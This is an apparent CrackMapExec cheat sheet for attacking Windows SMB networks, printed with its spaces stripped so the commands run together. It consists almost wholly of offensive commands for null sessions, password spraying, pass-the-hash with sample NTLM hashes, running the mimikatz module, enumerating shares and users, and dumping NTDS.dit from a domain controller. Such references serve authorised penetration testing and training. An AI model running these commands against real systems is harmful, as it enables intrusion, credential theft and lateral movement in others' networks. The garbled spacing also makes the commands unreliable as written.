# Usage:crackmapexecsmb192.168.1.1/24# NULL Sessionscrackmapexecsmb<target(s)>-u''-p''# Checking authcrackmapexecsmb192.168.1.1/24-uCoolAdmin-pARealGoodPassword# Passing the hashcrackmapexecsmb192.168.1.1/24-uAdministrator-HE52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B# Running Modulescrackmapexecsmb192.168.1.1/24-uAdministrator-pPassword1-Mmimikatz# Enumerate sharescrackmapexecsmb192.168.1.1/24-uAdministrator-pPassword1--shares# Enumerate domain userscmesmb192.168.1.0/24-uUserNAme-p'PASSWORDHERE'--users# Authentication + Checking Credentials (Domain)# Failed logins result in a [-]# Successful logins result in a [+] Domain\Username:Password# User/Hash - Pass the HASH after obtaining credentials such asAdministrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::#You can use both the full hash or just the nt hash (second half)cmesmb192.168.1.0/24-uUserNAme-H'LM:NT'cmesmb192.168.1.0/24-uUserNAme-H'NTHASH'cmesmb192.168.1.0/24-uAdministrator-H'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'cmesmb192.168.1.0/24-uAdministrator-H'13b29964cc2480b4ef454c59562e675c'# Continue to crack users and passwordscmesmb192.168.1.101-u/path/to/users.txt-pSummer18--continue-on-success# Dump the NTDS.dit file from target DC from secretsdump.pycmesmb192.168.1.100-uUserNAme-p'PASSWORDHERE'--ntdscmesmb192.168.1.100-uUserNAme-p'PASSWORDHERE'--ntdsvss# Spider C:\ drive with txt in the name. This will search for user.txt and usertxt.html. The $ must be escapedcmeSMB10.10.10.178-uUSER-pPASSWORD--spiderC\$ --usertxt# Mimikatz modulecme<protocol><target(s)>-uAdministrator-p'P@ssw0rd'-Mmimikatz-oCOMMAND='privilege::debug'